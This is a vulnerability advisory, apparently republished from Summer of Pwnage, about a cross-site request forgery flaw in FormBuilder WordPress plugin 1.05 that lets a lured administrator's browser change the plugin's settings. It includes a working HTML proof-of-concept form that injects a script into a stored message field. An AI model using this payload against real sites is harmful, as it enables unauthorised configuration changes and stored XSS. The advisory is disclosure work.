WordPress FormBuilder plugin version 1.05 suffers from a cross site request forgery vulnerability.
802b442dfa53531fd80f9ec001bf164207aa8164ff344771bb40415f62a94715------------------------------------------------------------------------
Cross-Site Request Forgery vulnerability in FormBuilder WordPress Plugin
allows plugin permissions modification
------------------------------------------------------------------------
Burak Kelebek, July 2016
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Request Forgery vulnerability has been encountered in the
FormBuilder WordPress Plugin. This issue allows an attacker to change
permission settings for the plugin by luring a logged on WordPress
Administrator into following a malicious link.
------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0005
------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on FormBuilder version 1.05.
------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in FormBuilder version 1.08.
------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_vulnerability_in_formbuilder_wordpress_plugin_allows_plugin_permissions_modification.html
The FormBuilder plugin lacks a CSRF (nonce) token on the request of saving permissions. Because of this an attacker is able to change permission settings for the plugin. To achieve this a logged on WordPress Administrator must be lured into following a malicious link. Proof of Concept code that demonstrates this issue can be found below.
Proof of concept
The Proof of Concept code below injects script code in the "Login Required Message" in the settings page of the FormBuilder plugin.
<html>
<body>
<form action="http://build.wordpress-develop.dev/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="task" value="wdm_save_settings" />
<input type="hidden" name="action" value="wdm_settings" />
<input type="hidden" name="section" value="basic" />
<input type="hidden" name="wpdm_permission_msg" value="Access Denied" />
<input type="hidden" name="wpdm_login_msg" value="<script>alert('csrf xss')</script>'" />
<input type="hidden" name="_wpdm_file_browser_root" value="/srv/www/wordpress-develop/build/" />
<input type="hidden" name="_wpdm_file_browser_access[]" value="administrator" />
<input type="hidden" name="__wpdm_sanitize_filename" value="0" />
<input type="hidden" name="__wpdm_download_speed" value="4096" />
<input type="hidden" name="__wpdm_download_resume" value="1" />
<input type="hidden" name="__wpdm_support_output_buffer" value="1" />
<input type="hidden" name="__wpdm_open_in_browser" value="0" />
<input type="hidden" name="_wpdm_recaptcha_site_key" value="" />
<input type="hidden" name="_wpdm_recaptcha_secret_key" value="" />
<input type="hidden" name="__wpdm_disable_scripts[]" value="" />
<input type="hidden" name="__wpdm_login_url" value="" />
<input type="hidden" name="__wpdm_register_url" value="" />
<input type="hidden" name="__wpdm_user_dashboard" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed